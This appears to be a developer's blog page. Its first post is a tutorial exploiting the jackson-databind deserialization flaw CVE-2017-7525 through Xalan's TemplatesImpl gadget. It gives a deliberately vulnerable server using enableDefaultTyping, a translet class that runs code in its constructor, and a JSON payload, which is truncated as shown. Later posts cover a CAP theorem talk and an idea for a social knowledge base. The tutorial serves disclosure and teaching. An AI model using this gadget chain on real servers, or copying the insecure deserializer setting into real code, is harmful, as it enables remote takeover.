Remotely execute Java code using JSON


How difficult is it to exploit a vulnerability in a common Java library in order to remotely execute Java code on a server and take control of it? Not very difficult, really. In this article we will demonstrate how to do that using CVE-2017-7525, a well-known vulnerability in jackson-databind, a widely used library for serializing and deserializing JSON that is also part of the spring-boot stack.

The sample code.

As we all know, serializing and deserializing JSON messages is a very common task, especially in modern microservice REST-based applications: almost every time an API is called, a JSON message is sent to the server and transformed into a Java object. Because of a stream of deserialization vulnerabilities in jackson-databind, it is now possible to write simple exploits that gain access to unpatched servers when polymorphic type handling is enabled.

In order to clearly explain the concepts, we introduce here a simple server that handles products with two REST APIs: one to get the list of products and one to add a new product (all the code is available on GitHub). Please note that this is just a sample: we want to provide a simple and understandable piece of code, and by no means can it be classified (we hope!) as production code.

Our Product class holds some basic product information:

public class Product {

    private int id;
    private String name;
    private String description;
    private Object data;

    protected Product() {
    }

    // constructors, getters and the duplicate() helper are omitted for brevity
}
Our ProductsDatabase class, just a glorified HashMap:

public class ProductsDatabase {

  private Map<String, Product> products = new HashMap<>();
  private AtomicInteger idGenerator = new AtomicInteger(0);

  public ProductsDatabase() {
     add(new Product(0, "apple", "Real apple from Italy", randomData()));
     add(new Product(0, "orange", "Real orange from Italy", randomData()));
     add(new Product(0, "kiwi", "Real kiwi from Italy", randomData()));
  }

  public Collection<Product> list() {
    return Collections.unmodifiableCollection(products.values());
  }

  public Product add(Product newProduct) {
    Integer newId = idGenerator.incrementAndGet();
    Product product = newProduct.duplicate(newId);
    products.put(newId.toString(), product);
    return product;
  }
}

Our simple server, written with SparkJava:

public class Main {

  private static ProductsDatabase products = new ProductsDatabase();
  private static ObjectMapper deserializer = new ObjectMapper().enableDefaultTyping();
  private static ObjectMapper serializer = new ObjectMapper();

  public static void main(String[] args) {
    port(8888);

    // GET list all products
    get("/products", (request, response) -> {
      Collection<Product> res = products.list();
      return serializer.writeValueAsString(res);
    });

    // POST add new product
    post("/products", (request, response) -> {
      Product received = deserializer.readValue(request.body(), Product.class);
      return serializer.writeValueAsString(products.add(received));
    });
  }
}

You can add a product to the database with a simple curl call with a JSON body containing the new product data:

curl -i -X POST -d '{"name":"melon","description":"Real melon from Italy", "data":["java.util.HashMap",{"cost":2,"color":"yellow"}]}' http://localhost:8888/products

The exploit.

In order to exploit the vulnerability, we need an attack vector. On this occasion we decided to use Apache Xalan, a common XSLT library that is also bundled in the JDK (which, up to version 8u45, can itself be used as the vector in the same way Xalan is used here). Please note that there are many other options available as attack vectors, but for the sake of simplicity we will focus here on a very specific one.

We will use a particular class from Xalan which is capable of deserializing an encoded class file from an XML document and dynamically creating an instance of that class: we will craft a JSON message containing the encoded bytecode of this exploit class:

public class Exploit extends org.apache.xalan.xsltc.runtime.AbstractTranslet {

  public Exploit() throws Exception {
    System.err.println("Your server has been compromised!");
  }

  @Override
  public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
  }

  @Override
  public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
  }
}

We just need to compile this source code into a .class file, encode it in Base64, and prepare our evil JSON message:

  "name": "fakeapple",
  "description": "Fake fruit from UK",
  "data": ["org.apache.xalan.xsltc.trax.TemplatesImpl",
    "transletName": "oops!",
    "outputProperties": {}

After sending the message to the server as a normal “add product” request, the encoded class will be instantiated by Xalan's TemplatesImpl class while Jackson populates the outputProperties property: in order to compute that value, TemplatesImpl loads and instantiates the embedded translet class, so its constructor (and our evil code with it) is executed and the server is compromised. Yes, you might see exceptions on the server, but by then it's too late.
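Conceptually, the gadget boils down to defining a class from attacker-supplied bytes and then instantiating it, which is exactly what makes the constructor run. A simplified, stdlib-only sketch of that core step (an illustration, not Xalan's actual code):

```java
// Minimal illustration of why "load a class from raw bytes, then
// instantiate it" equals code execution: the constructor runs as soon
// as an instance is created. TemplatesImpl does essentially this with
// the bytecode embedded in the JSON payload.
public class BytesClassLoader extends ClassLoader {

    // Turn raw bytes into a Class object; the class name is read
    // directly from the bytecode, so null is fine here.
    public Class<?> define(byte[] classBytes) {
        return defineClass(null, classBytes, 0, classBytes.length);
    }
}
```

Once `define` returns, a plain `newInstance()` on the resulting `Class` is all it takes to run the attacker's constructor.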


This is just one example of the hundreds of exploits currently possible through public vulnerabilities in various open source libraries, and for that reason it's extremely important that you add to your build pipeline a scanner capable of detecting such situations and blocking the build when one is found. We would kindly invite you to use our simple command line client, available at, and avoid future nasty surprises. You do not want to be the next Equifax.

You can reach me at!

Disclaimer: please note that all this information is publicly available on the internet. This is just a summary post from a cybersecurity practitioner and nothing else. The code provided is for research purposes only.
This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.

CAP Theorem @ Codemotion 2016, Milan

I just came back from Codemotion Milan, and it was great! Apparently a lot of people liked my presentation; someone told me that they really understood the CAP theorem for the first time. Which is absolutely great!

Thanks to everybody who attended: you were a fantastic bunch, and I feel absolutely grateful and privileged to have been there!

I am looking forward to the next tech meeting or conference!

Ah, the code is on GitHub, but please keep in mind that it is basically the result of a four-day spike, so it's not particularly good. But I promise I will refactor it 🙂

The recording (in Italian) is available on YouTube thanks to Codemotion.


How to make Google Search irrelevant

This is a concept I thought about a year ago, and it never went past the inception phase. I still think it's a good one, and for that reason I want to share it so that it won't get lost in time 🙂

Vision: “Replace Google search”

The final vision for this project is to replace Google search. At the moment there’s no way to create a better ranking algorithm than the one used by Google, so the only way to beat Google search is to make it irrelevant, like Netflix did to Blockbuster or like digital music did to CDs.

The aim of this project is to collect all human knowledge in a single, shared database, with all users contributing to it while at the same time augmenting their personal knowledge.

Why this will work

As a person I am always frustrated by the time I spend finding something on the internet, or even worse, when I am offline. Searching the internet might be fast, but even when the experience is okay, I tend to forget things, and I repeat searches I did in the past, sometimes very frequently. What I would like is to maintain this knowledge somewhere, in a place where it's always accessible and extremely easy to search. At the moment there's no such tool around: Evernote and Pocket, two tools often cited regarding this idea, are built around a far less bold metaphor; they do not focus on social interaction and have no ranking of their contents, as they are centered on a single person.

Strategy (overview)

The implementation strategy will happen in three phases:

Phase one:
Launch of an application suite to collect a person's knowledge

    • always available, on every device, must work offline
    • a simple and clear metaphor to manage knowledge
    • a set of super simple mechanisms to import knowledge from existing sources (i.e. Quora, Wikipedia, IMDB, Stackoverflow, emails…)

Phase two
Introduce social capabilities

    • a social mechanism to share or include knowledge of other people
    • a ranking algorithm to qualify better content from better users

Phase three
Launch of a worldwide site to explore the knowledge of mankind, effectively replacing all existing focused and unfocused sources

    • all existing human knowledge will be available, already catalogued and sorted by human beings, voluntarily
    • the ranking algorithm will allow the relevant and better contents to emerge spontaneously and naturally

Strategy (detailed)

A more detailed explanation of the three-phases strategy follows.

Phase one: application suite

An application that must be always available, whether I am using a mobile phone, a desktop computer, or even a Kindle. I should be able to install an application or plugin that lets me push data into my knowledge base without hassle: a set of dedicated browser plugins is highly recommended. It must also work offline: my entire database (or at least the most relevant part of it) shall always be accessible, and I will be able to push new data into the database at any time, as it will be synced automatically as soon as I am online again.

A simple and clear metaphor for managing knowledge has to be found; it has to support both adding information to the database and retrieving it. At the moment the most promising model is based on a graph of information, with tags associated to it, and maybe different clusters, but it will be very important to find an extremely simple, effective and attractive mechanism for the end user to store and retrieve their knowledge (if we had telepathy we should use that). The metaphor must support some form of classification of contents, such as pre-defined tagging, clerical, prototyping.

Because we are consolidating knowledge, we need to provide a set of super simple tools to import knowledge from existing sources, specifically on the internet: Quora, Wikipedia, IMDB, Stackoverflow, and even personal emails. Ideally we should think about two different mechanisms to collect a piece of information: you can copy it, so that it's merged into your database and you can change it as much as you want, or link it, so that you can still see the whole information (as it's constantly synced from the remote side) but in read-only mode. An advanced merge mode could be considered for copied contents, as long as it remains extremely simple.
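Purely as an illustration of the copy-versus-link distinction (all class and method names here are hypothetical, not a committed design), the two import modes could be modeled like this:

```java
// Hypothetical model of an imported piece of knowledge: a COPY owns its
// content and can be edited; a LINK points back at the remote source and
// stays read-only (it is refreshed by syncing, not by local edits).
public class ImportedItem {

    enum Mode { COPY, LINK }

    private final Mode mode;
    private final String sourceUrl;
    private String content;

    ImportedItem(Mode mode, String sourceUrl, String content) {
        this.mode = mode;
        this.sourceUrl = sourceUrl;
        this.content = content;
    }

    boolean isEditable() {
        return mode == Mode.COPY;
    }

    void edit(String newContent) {
        if (!isEditable()) {
            throw new IllegalStateException("Linked content is read-only");
        }
        this.content = newContent;
    }

    String content() { return content; }

    String sourceUrl() { return sourceUrl; }
}
```

The advanced merge mode mentioned above would then only ever apply to COPY items, since LINK items are overwritten by the sync.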

Phase two: social capabilities

A strong social element must be added to the platform from the very start. The basic mechanism would allow me to declare some content “public” or “friendly” (visible to a set of friends or a circle), so that other people can pull my content into their database (again, either copy-and-merge or link). An integration with either Facebook or Google+ is mandatory; more integrations are highly advisable.

An important step that enables the transition to phase three of the project is a very good ranking algorithm, so that we can identify the better content and the better users, ideally the “experts in the field”: for that reason the metaphor, as explained before, must enable the classification of contents. Such a ranking algorithm should be related to relevance and, in general, to the reputation of the users, the same way Quora or Stackoverflow, for example, rank their users and automatically decide which contents should in principle be more relevant to a question: how many users linked such content? Or copied it? Or liked it? Explicit rating should also be allowed, but in general the more automation the better. Some sort of gamified ranking is of course necessary.
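As a purely illustrative sketch (the weights, names and formula below are invented for this example, not a designed algorithm), such a blended ranking could start from a weighted mix of the automatic signals:

```java
// Hypothetical ranking sketch: blends automatic signals (links, copies,
// likes) with the author's reputation. All weights are placeholders.
public class RankingSketch {

    // reputation is expected in the 0.0 .. 1.0 range
    static double score(int links, int copies, int likes, double reputation) {
        // Linking is the strongest endorsement, then copying, then liking
        double signal = 3.0 * links + 2.0 * copies + 1.0 * likes;
        // log1p keeps huge counts from dominating; reputation scales the result
        return Math.log1p(signal) * (0.5 + 0.5 * reputation);
    }

    public static void main(String[] args) {
        System.out.println(score(10, 5, 20, 0.8));
    }
}
```

A real version would of course have to be tuned against abuse, exactly the problem Quora and Stackoverflow solve with their reputation systems.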

Phase three: the worldwide site

The final aim of this project is to create a “socialpedia” or a “knowledgepedia”: a form of global knowledge encyclopedia managed by all its users. The main difference from the most obvious antagonist, Wikipedia, is the way contents will emerge: we will not be collecting and classifying information, the users will do it, as they organize their own knowledge. In the process of doing that, they will build a global knowledge base that can then be used to render any other search useless or redundant. The ranking algorithm will guarantee that the best content will surface in such a database, and it will be invaluable because actual human beings, not machines or algorithms, will have classified it.

At that point, you will hold the world's knowledge. Like Google now, but better.